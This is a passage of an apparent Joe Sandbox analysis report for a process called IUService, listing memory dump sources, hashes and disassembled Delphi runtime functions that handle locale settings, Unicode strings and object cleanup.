                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$CloseLoadModule$qqrpboResourceSystem@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2494118284-0
                                                                                                                                            • Opcode ID: 497cbbe01210680b9eb75a8a48ad75587f7f44726e523d6886d2e020856a3897
                                                                                                                                            • Instruction ID: 1d1766b6d6bdf7e2d7684c9af6fc5eeb11ad942625cb0d89418ba6028d03f5c9
                                                                                                                                            • Opcode Fuzzy Hash: 497cbbe01210680b9eb75a8a48ad75587f7f44726e523d6886d2e020856a3897
                                                                                                                                            • Instruction Fuzzy Hash: B0E06D71A013508BEB04CFA8D8C1E8633D4AB08624F444A51EC14CF247D370DD1087E1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 481472006-0
                                                                                                                                            • Opcode ID: 449684beae46f2d3532cd87c13f45d50b14c143529009afe056ee12052635846
                                                                                                                                            • Instruction ID: 603b05ba210550ab35cb675da7c298ca264b39312a6da9293f8d4f7aa50b5376
                                                                                                                                            • Opcode Fuzzy Hash: 449684beae46f2d3532cd87c13f45d50b14c143529009afe056ee12052635846
                                                                                                                                            • Instruction Fuzzy Hash: 22A012408058A101954027180C0323430409910620FC8474178FC502D1ED1D012081D7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4a32254a26ec7745de881303c7ac90fb81c22ee6ef5ce8fe5113023a79fea4d0
                                                                                                                                            • Instruction ID: 919b428233cae173511029aa0f2b27a77bfc61ebef004b7e03d13958cfa4ce04
                                                                                                                                            • Opcode Fuzzy Hash: 4a32254a26ec7745de881303c7ac90fb81c22ee6ef5ce8fe5113023a79fea4d0
                                                                                                                                            • Instruction Fuzzy Hash: ACF045A160D3C26ED747AB7898AD993BF284F4312030F84DBD885DF0A7E2905406D736
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4dff6d1aff6dbcb5c55c52f9778a04b01edc7b7968e91cb192ddaf45763efcb2
                                                                                                                                            • Instruction ID: 5246c103563c2e39cd0757797e0bd30880b93580db4b712d1ebc8a1cb4ddd487
                                                                                                                                            • Opcode Fuzzy Hash: 4dff6d1aff6dbcb5c55c52f9778a04b01edc7b7968e91cb192ddaf45763efcb2
                                                                                                                                            • Instruction Fuzzy Hash: BAD1A0346055898FCF02EBA4E8D18DDB7B1AF54202F68C752F9049B26AC734DE42DBD2
                                                                                                                                            APIs
                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002909F
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290AC
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290C9
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290D4
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290E9
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290F3
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002910A
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029114
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029127
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002913B
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029154
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002915E
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029171
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002918A
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291A0
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291B5
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291CB
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291DB
                                                                                                                                              • Part of subcall function 50025BC4: GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,50028D40,00000000,50028F6A,?,?,00000000,00000000), ref: 50025BD7
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291F4
                                                                                                                                              • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                                                              • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291FF
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029214
                                                                                                                                              • Part of subcall function 50025B78: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002921F
                                                                                                                                              • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                                                              • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                                                              • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029229
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029233
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029248
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029252
                                                                                                                                              • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029263
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029272
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029287
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029291
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292AA
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292B4
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292C5
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292D4
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,:mm,?,?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292EF
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002930A
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002931A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$String$Sysutils@$Locale$System@@$Asg$qqrr20Stringx20$Str$qqriix20$Def$qqrx20Stringi$Char$qqriib$FreeInfoMem$qqrpvN$qqrv$CharFromLen$qqrr20Long$qqrx20Move$qqrpxvpviString$qqriStringpbiStringriThreadValid
                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                            • API String ID: 1591733115-2493093252
                                                                                                                                            • Opcode ID: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                                                            • Instruction ID: c56b8177db0a57ba453c3af60c07cd0ceb7fdab362b64694d1a226fae421d36e
                                                                                                                                            • Opcode Fuzzy Hash: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                                                            • Instruction Fuzzy Hash: 047158317022CA9BDF01DBE4F891ADEB3BADF98300F908637B105AB656D635DD058794
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026036
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002603F
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002604E
                                                                                                                                              • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                                                              • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002605B
                                                                                                                                              • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260A5
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260AF
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260B8
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260BD
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260D0
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260F2
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026110
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002612B
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026135
                                                                                                                                            • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026153
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026163
                                                                                                                                            • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002617F
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002618F
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                              • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261AA
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261BA
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026202
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026207
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$System@@$String$Stringx20$Sysutils@$Cat$qqrr20$From$Asg$qqrr20Comp$qqrpxbt1uiLocaleStringi$AnsiCharEnsureLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%$Char$qqrr20Clr$qqrpvCopy$qqrx20Def$qqrx20InfoInternalLen$qqrr20Length$qqrr20Length$qqrx20Long$qqrx20Move$qqrpxvpviStr$qqriix20StringbStringiiStringpbiStringriThread
                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                            • API String ID: 1621705807-1253427255
                                                                                                                                            • Opcode ID: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                                                            • Instruction ID: 4996f8794606f03fae622fcb1ff33eb4fce06e18e571e892f00786f695fe8f9d
                                                                                                                                            • Opcode Fuzzy Hash: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                                                            • Instruction Fuzzy Hash: 6A51C234A021CBCBDB10DBE8E9925EEB3A5EF91300F644363A500D7362DB74EE159791
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@FreeAndNil$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA0A
                                                                                                                                              • Part of subcall function 5002B124: @System@TObject@Free$qqrv.RTL120(5002EA0F,00000000,5002EB85), ref: 5002B12C
                                                                                                                                            • @Sysutils@TEncoding@FreeEncodings$qqrv.RTL120(00000000,5002EB85), ref: 5002EA14
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                                                            • @System@RemoveModuleUnloadProc$qqrpqqrui$v.RTL120(00000000,5002EB85), ref: 5002EA1E
                                                                                                                                              • Part of subcall function 5000C94C: @System@@FreeMem$qqrpv.RTL120(?,?,?,?,5000C929), ref: 5000C976
                                                                                                                                              • Part of subcall function 5002B720: @System@@Dispose$qqrpvt1.RTL120(?,5002EA28,00000000,5002EB85), ref: 5002B73C
                                                                                                                                              • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DBC,00000000), ref: 500274E1
                                                                                                                                              • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DC0,00000000), ref: 500274F3
                                                                                                                                              • Part of subcall function 50027254: @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                                                              • Part of subcall function 50027254: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA46
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA50
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAB5
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EACA
                                                                                                                                              • Part of subcall function 5000AF28: @System@@LStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF7A
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EADF
                                                                                                                                              • Part of subcall function 5000AF28: @System@@LStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF86
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAF4
                                                                                                                                              • Part of subcall function 5000AF28: @System@@WStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF97
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB09
                                                                                                                                              • Part of subcall function 5000AF28: @System@@WStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AFA3
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB19
                                                                                                                                              • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                                                              • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB29
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB48
